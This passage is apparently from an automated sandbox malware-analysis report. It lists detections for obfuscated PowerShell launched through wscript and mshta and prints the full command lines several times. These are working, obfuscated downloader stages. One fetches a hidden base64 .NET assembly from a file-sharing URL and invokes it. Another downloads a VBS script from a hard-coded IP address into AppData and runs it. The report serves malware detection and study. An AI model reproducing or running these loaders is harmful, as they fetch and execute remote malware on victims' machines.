inked
Source:	Binary string: aspnet_compiler.pdb source: djvbaae, 0000000F.00000000.2357331428.0000000000192000.00000002.00000001.01000000.0000000C.sdmp, djvbaae.14.dr
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.pdb source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 